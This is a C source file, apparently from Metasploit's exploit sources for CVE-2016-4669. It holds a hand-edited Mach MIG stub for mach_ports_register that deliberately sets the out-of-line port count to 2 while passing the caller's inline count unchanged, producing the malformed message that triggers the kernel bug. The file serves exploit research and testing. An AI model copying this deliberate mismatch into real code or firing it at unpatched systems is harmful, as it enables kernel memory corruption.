GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2016-4669/task.c
#include "__task.h"
/*
 * MIG client-stub scaffolding. Every hook below is guarded by #ifndef, so a
 * definition supplied earlier (for example by "__task.h") takes precedence
 * over the defaults given here.
 */

/* 0 selects field-by-field initialisation of the out-of-line ports
 * descriptor in the stub instead of copying a static template. */
#ifndef UseStaticTemplates
#define UseStaticTemplates 0
#endif /* UseStaticTemplates */

/*
 * Reply-port cleanup after a failed mach_msg(). For the three send errors
 * listed, the reply port is handed back with mig_put_reply_port(); for any
 * other error it is released with mig_dealloc_reply_port().
 * The expansion refers to a local named InP, so it can only be used where
 * such a variable is in scope.
 */
#ifndef __MachMsgErrorWithoutTimeout
#define __MachMsgErrorWithoutTimeout(_R_) { \
    switch (_R_) { \
    case MACH_SEND_INVALID_DATA: \
    case MACH_SEND_INVALID_DEST: \
    case MACH_SEND_INVALID_HEADER: \
        mig_put_reply_port(InP->Head.msgh_reply_port); \
        break; \
    default: \
        mig_dealloc_reply_port(InP->Head.msgh_reply_port); \
    } \
}
#endif /* __MachMsgErrorWithoutTimeout */

/* Tracing hooks placed after/before the mach_msg() call; they expand to
 * nothing unless defined beforehand. */
#ifndef __AfterSendRpc
#define __AfterSendRpc(_NUM_, _NAME_)
#endif /* __AfterSendRpc */

#ifndef __BeforeSendRpc
#define __BeforeSendRpc(_NUM_, _NAME_)
#endif /* __BeforeSendRpc */

/* Client-side aliases: the request goes to the header's remote port and the
 * reply is received on its local port. */
#define msgh_request_port msgh_remote_port
#define msgh_reply_port msgh_local_port

/* Linkage of stub-private helpers (file-local, inline). */
#ifndef mig_internal
#define mig_internal static __inline__
#endif /* mig_internal */

/* Linkage of exported stubs (no qualifier by default). */
#ifndef mig_external
#define mig_external
#endif /* mig_external */

/* Reply type checking is compiled in only when __MigTypeCheck is non-zero;
 * the older TypeCheck switch is honoured when __MigTypeCheck is not set. */
#if !defined(__MigTypeCheck) && defined(TypeCheck)
#define __MigTypeCheck TypeCheck /* Legacy setting */
#endif /* !defined(__MigTypeCheck) */

/* Declaration hook expanded among the stub's locals; empty by default. */
#ifndef __DeclareSendRpc
#define __DeclareSendRpc(_NUM_, _NAME_)
#endif /* __DeclareSendRpc */
/*
 * Validate the reply message received for mach_ports_register.
 *
 * Out0P  reply buffer as filled in by mach_msg().
 *
 * Returns MIG_SERVER_DIED when the message is a send-once notification,
 * MIG_REPLY_MISMATCH when it carries any other id than 3503,
 * MIG_TYPE_ERROR (only when __MigTypeCheck is enabled) when the message is
 * complex or its size differs from sizeof(__Reply), and otherwise the
 * RetCode stored in the reply.
 */
mig_internal kern_return_t __MIG_check__Reply__mach_ports_register_t(__Reply__mach_ports_register_t *Out0P)
{
    typedef __Reply__mach_ports_register_t __Reply __attribute__((unused));

    /* The reply id is the request id (3403) plus 100. */
    if (Out0P->Head.msgh_id != 3503) {
        return (Out0P->Head.msgh_id == MACH_NOTIFY_SEND_ONCE)
            ? MIG_SERVER_DIED
            : MIG_REPLY_MISMATCH;
    }

#if __MigTypeCheck
    /* A well-formed reply is a simple message of exactly the expected size. */
    if (Out0P->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX) {
        return MIG_TYPE_ERROR;
    }
    if (Out0P->Head.msgh_size != (mach_msg_size_t)sizeof(__Reply)) {
        return MIG_TYPE_ERROR;
    }
#endif /* __MigTypeCheck */

    return Out0P->RetCode;
}
/* Routine mach_ports_register */
/*
 * Hand-edited MIG client stub for mach_ports_register (message id 3403).
 *
 * target_task       port the request is sent to.
 * init_port_set     address of the out-of-line port array.
 * init_port_setCnt  element count written into the inline message body.
 *
 * Returns the mach_msg() error if the send/receive fails, the result of the
 * reply check when that check is compiled in, and KERN_SUCCESS otherwise.
 *
 * Security note: this stub differs from what MIG would generate. The
 * out-of-line descriptor's count is pinned to 2 (the original line, per its
 * trailing comment, used init_port_setCnt), while the inline
 * init_port_setCnt field still carries the caller's value. The message can
 * therefore state two different lengths for the same array. A receiver has
 * to treat both fields as independent untrusted input and reject the
 * message when they disagree, rather than copying by one and iterating by
 * the other.
 * NOTE(review): the file path places this stub under CVE-2016-4669;
 * presumably this length disagreement is what that advisory covers.
 * Confirm against the advisory text.
 *
 * The reply check runs only if
 * __MIG_check__Reply__mach_ports_register_t__defined is defined, and nothing
 * in this file defines it. Unless "__task.h" does, the reply's RetCode is
 * never inspected and KERN_SUCCESS is returned whenever mach_msg() succeeds.
 */
mig_external kern_return_t __mach_ports_register
(
    task_t target_task,
    mach_port_array_t init_port_set,
    mach_msg_type_number_t init_port_setCnt
)
{
    /* Wire layouts, 4-byte packed when __MigPackStructs is set. */
#ifdef __MigPackStructs
#pragma pack(4)
#endif
    typedef struct {
        mach_msg_header_t Head;
        /* start of the kernel processed data */
        mach_msg_body_t msgh_body;
        mach_msg_ool_ports_descriptor_t init_port_set;
        /* end of the kernel processed data */
        NDR_record_t NDR;
        mach_msg_type_number_t init_port_setCnt;
    } Request __attribute__((unused));

    /* Reply as received, including the trailer. */
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
        mach_msg_trailer_t trailer;
    } Reply __attribute__((unused));

    /* Reply without the trailer; same members as mig_reply_error_t. */
    typedef struct {
        mach_msg_header_t Head;
        NDR_record_t NDR;
        kern_return_t RetCode;
    } __Reply __attribute__((unused));
#ifdef __MigPackStructs
#pragma pack()
#endif

    /* Request and reply share one buffer: the reply overwrites the request. */
    union {
        Request In;
        Reply Out;
    } Mess;

    Request *InP = &Mess.In;
    Reply *Out0P = &Mess.Out;

    mach_msg_return_t msg_result;

#ifdef __MIG_check__Reply__mach_ports_register_t__defined
    kern_return_t check_result;
#endif /* __MIG_check__Reply__mach_ports_register_t__defined */

    __DeclareSendRpc(3403, "mach_ports_register")

#if UseStaticTemplates
    static const mach_msg_ool_ports_descriptor_t init_port_setTemplate = {
        /* addr = */ (void *)0,
        /* coun = */ 0,
        /* deal = */ FALSE,
        /* copy is meaningful only in overwrite mode */
        /* copy = */ MACH_MSG_PHYSICAL_COPY,
        /* disp = */ 19,
        /* type = */ MACH_MSG_OOL_PORTS_DESCRIPTOR,
    };
#endif /* UseStaticTemplates */

    InP->msgh_body.msgh_descriptor_count = 1;

    /* Descriptor fields that do not depend on the arguments. On the
     * field-by-field path the descriptor's copy member is left unassigned. */
#if UseStaticTemplates
    InP->init_port_set = init_port_setTemplate;
#else /* UseStaticTemplates */
    InP->init_port_set.disposition = 19;
    InP->init_port_set.deallocate = FALSE;
    InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
#endif /* UseStaticTemplates */

    InP->init_port_set.address = (void *)(init_port_set);
    /* Deliberately fixed; no longer tied to the inline count below. */
    InP->init_port_set.count = 2; // was init_port_setCnt;

    InP->NDR = NDR_record;

    /* Inline count: passed through from the caller unchanged. */
    InP->init_port_setCnt = init_port_setCnt;

    InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX |
        MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    /* msgh_size passed as argument */
    InP->Head.msgh_request_port = target_task;
    InP->Head.msgh_reply_port = mig_get_reply_port();
    InP->Head.msgh_id = 3403;

    /* BEGIN VOUCHER CODE */
#ifdef USING_VOUCHERS
    if (voucher_mach_msg_set != NULL) {
        voucher_mach_msg_set(&InP->Head);
    }
#endif // USING_VOUCHERS
    /* END VOUCHER CODE */

    /* Combined send and receive, no timeout, reply lands in the same buffer. */
    __BeforeSendRpc(3403, "mach_ports_register")
    msg_result = mach_msg(&InP->Head,
                          MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE,
                          (mach_msg_size_t)sizeof(Request),
                          (mach_msg_size_t)sizeof(Reply),
                          InP->Head.msgh_reply_port,
                          MACH_MSG_TIMEOUT_NONE,
                          MACH_PORT_NULL);
    __AfterSendRpc(3403, "mach_ports_register")

    if (msg_result != MACH_MSG_SUCCESS) {
        /* Return or release the reply port according to the error. */
        __MachMsgErrorWithoutTimeout(msg_result);
        return msg_result;
    }

#if defined(__MIG_check__Reply__mach_ports_register_t__defined)
    check_result = __MIG_check__Reply__mach_ports_register_t((__Reply__mach_ports_register_t *)Out0P);
    if (check_result != MACH_MSG_SUCCESS) {
        return check_result;
    }
#endif /* defined(__MIG_check__Reply__mach_ports_register_t__defined) */

    return KERN_SUCCESS;
}